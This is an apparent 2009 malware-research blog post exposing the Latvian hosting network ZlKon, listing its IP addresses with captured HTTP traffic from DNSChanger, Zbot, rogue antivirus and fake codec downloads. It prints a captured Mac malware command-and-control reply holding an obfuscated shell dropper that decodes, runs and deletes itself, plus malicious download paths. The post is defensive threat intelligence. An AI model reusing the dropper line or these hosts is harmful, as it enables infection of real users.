Bad Actors Part 2 - ZlKon

In this edition of "rooting out the Bad Actors" I'm going to take a look at ZlKon, hosted by "Datoru Express Serviss, Ltd" in Latvia.

As you can see, they only have a single /23 address block, but everything I found indicates that the whole range is dedicated to providing services for hosting malware, exploits, and those who profit from them.

inetnum:        94.247.2.0 - 94.247.3.255
netname:        ZLKON
descr:          ZlKon
country:        LV
role:           ZlKon HostMaster
address:        Lilijas iela 4-74
address:        Riga, LV-1055
address:        Latvija
phone:          +371 26330593
abuse-mailbox:  abuse@zlkon.lv


First up is 94.247.2.193.  The connections I see appear to be from Trojan.Alureon, which is often used in conjunction with the DNSChanger family of information stealers.

POST /extra.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

p.z..|t||b...dd``l.nb..fkX#U[PT \[[RRWU\VCJ@


Also on 94.247.2.193 I can see some of the DNSChanger communication:


POST /cgi-bin/generator HTTP/1.0
Content-Length: 45

.,++""'(0.d.f..`..l.k.j.......wptsz z.{x.vzr


On 94.247.2.104 I see more DNSChanger traffic:

POST /cgi-bin/generator HTTP/1.0
Content-Length: 45

U.......~..|xupwr.ut..z.~|}...gf...o.j`0

On 94.247.2.31 (DNS hosted at 94.247.2.40) I can see traffic to a Rogue/fake AV site:

GET /counter/img.php?tracker_id=10290&product_id=3&cookie=1&referrer= HTTP/1.1
Accept: */*
Referer: http://antiviralscanner14.com/sysgd09_2/3/10290
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: sg10scanner.com
Connection: Keep-Alive


On 94.247.2.30 I see some traffic heading to zcounter.cn (DNS on 94.247.2.38), which hits me with some ugly looking javascript which eventually is a couple PDF exploits.  It's easier to show visually:
Lv1

On 94.247.3.74 I see more Rogue AV traffic:

GET /hitin.php?land=20&affid=01800 HTTP/1.1
Host: websafetyscan.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 YFF3 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive


I see very similar Rogue traffic on 94.247.3.3 (DNS on 94.247.3.4 and 94.247.3.5):

GET /hitin.php?land=20&affid=01900 HTTP/1.1
Host: swiftsafetyexamine.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

Similarly, I can see another Rogue on 94.247.2.241:

GET /stat.php?func=install&uid=xxxxxxx&landing=-1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: int.ms-asreport1.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

Here's a fake Flash player - which is really DNSChanger - being downloaded from 94.247.2.183.  The referer page, codec-networks.com, is hosted on 94.247.2.34

GET /download/3070367542413d3dfc76292e/Flash.Player.Update.v9.31.exe HTTP/1.1
Host: hqextra.com
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SBUA)
Connection: Close
Range: bytes=0-
Referer: http://codec-networks.com/video/?videoid=69645#

On that same host, I noticed something cute.  If your User-Agent string was a Mac, then they gave you the Mac version of the malware. Who says there is no malware for Macs?

GET /download/3933657064413d3d7de86a0f/CodecUpdate.v1.19.dmg HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1
Referer: http://codec-networks.com/update/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: applesofts.com

I infected a Mac I had here with the above and you can see some *very* rudimentary command and control going on with 94.247.2.109.  Macs are really in their infancy in terms of well developed, sophisticated malware.  It's the equivalent sophisitication of an IRC bot on Windows:

GET /cgi-bin/generator.pl HTTP/1.0
User-Agent: i386;0;7000;my_hostname;

HTTP/1.1 200 OK
Date: Thu, 12 Feb 2009 22:15:17 GMT
Server: Apache/2.0.63 (FreeBSD) PHP/5.2.6 with Suhosin-Patch
Time: 686
Content-Length: 686
Connection: close
Content-Type: text/html

#!/bin/sh
tail -11 $0 | uudecode -o /dev/stdout | sed 's/TEERTS/'`echo ml.pll.oop.ojl | tr iopjklbnmv 0123456789`'/' | sed 's/CIGAM/'`echo ml.pll.oop.ojo | tr iopjklbnmv 0123456789`'/'| sh && rm $0 && exit
begin 777 mac
*** taken out because it was triggering AVs - contact me if you want it ***
end

For the inclined, there is some other malware hosted on that IP as well:

/download/634f74314a773d3dabc40ad9/Flash.Player.Update.v9.19.dmg
/download/6d664c4a38673d3d16f7f5d1/MediaCodec.exe
/download/737a6d7369413d3dabdfb16c/ghostreader.exe
/download/7a37347537513d3db8fa1e80/youlovedmesheard.dmg

I see some exploits being hosted on 94.247.2.122.  It appears they are spamming some porn sites to get their malicious code inside a popup:

GET /?ref=moviepost.com HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
Referer: http://www.homeworkporn.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: 94.247.2.122

The exploits are barely obfuscated and might be of interest to those who don't often see Javascript based attacks:

Lv2 The payload is a file called 0.gif, which is really an EXE, and seems to be some sort of rogue

On 94.247.3.251 I see a ton of traffic to innah.cn, which I'm 99% sure is Zbot.  Based on the amount of data getting shipped up via HTTP POST, I assume it's snarfing all sort of information off the box. I wouldn't mind some confirmation if anyone knows for sure - my email is at the bottom of this post.

POST /nobody/data.php?id=xxxxxxxx&ver=812&m=0&btype=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.10 (Windows NT 5.1; Ucheck; en)
Host: innah.cn
Content-Length: 6992
Cache-Control: no-cache

GET /adv/startup.php?id=xxxxxxx&ver=834&btype=1 HTTP/1.1
User-Agent: Opera/9.10 (Windows NT 5.1; Ucheck; en)
Host: innah.cn
Cache-Control: no-cache

On 94.247.2.58 I see what I'm pretty sure is Trojan.Zlob faking search results (I took out the relevant data). 

GET /cp/x/?u=0A1&i=0+xxxxx++++++++++++++++ HTTP/1.1
Host: 94.247.2.58
Cache-Control: no-cache

The response looks like this:

HTTP/1.1 302 Found
Date: Fri, 13 Feb 2009 03:07:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Location: http://78.110.175.15/cp/x/?u=0A1&i=0+exxxxxx++++++++++++++++
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

On 94.247.2.228 they are hosting a redirector for a Canadian pharmacy scam site.  They also host DNS services on 94.247.2.227     for other pharmacy sites.  Additionally, on 94.247.2.226, they host DNS for the malware distributing (currently down) 3d-softwareportal.com

analytecs.com is hosted on 94.247.3.192 (DNS at 94.247.3.233), which Google tells me "May harm my computer".

While watching some of our honeynet traffic, I noticed that 94.247.3.206 had spammed our blog.  Hmm.

On 94.247.2.50 I see what Microsoft calls Tearspear.  It looks to be a dropper associated with Zbot.

GET /.cfg/o/set.cfg HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 94.247.2.50
Pragma: no-cache

On 94.247.2.76 I see malware hosted that I can identify as Trojan.Renos   

GET /balamutra/balamutra.php HTTP/1.1
User-Agent: wget 3.0
Hos

t: 94.247.2.76
Cache-Control: no-cache

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
Content-Disposition: attachment; filename=balamutra.exe

On 94.247.2.38 I was being served a copy of Trojan.Rlsloup, which is a generic rookit dropper Trojan

GET /dok/doc.txt HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: lorentil.cn
Connection: Keep-Alive

Looking for malware at ZlKon is really like shooting fish in a barrel.  The examples I listed above were all from the past couple days - I didn't pull in any historical data.  Doing simple searches on the IPs by hand will show you that malware hosting on Zlkon is not a recent development - they've been a Bad Actor for quite some time.

Here are a couple links which also show epic badness at ZlKon:

Malware Domain List

Real Security

Alex Lanstein @ FireEye Malware Intelligence Lab
Questions/Comments to research at fireeye dawt com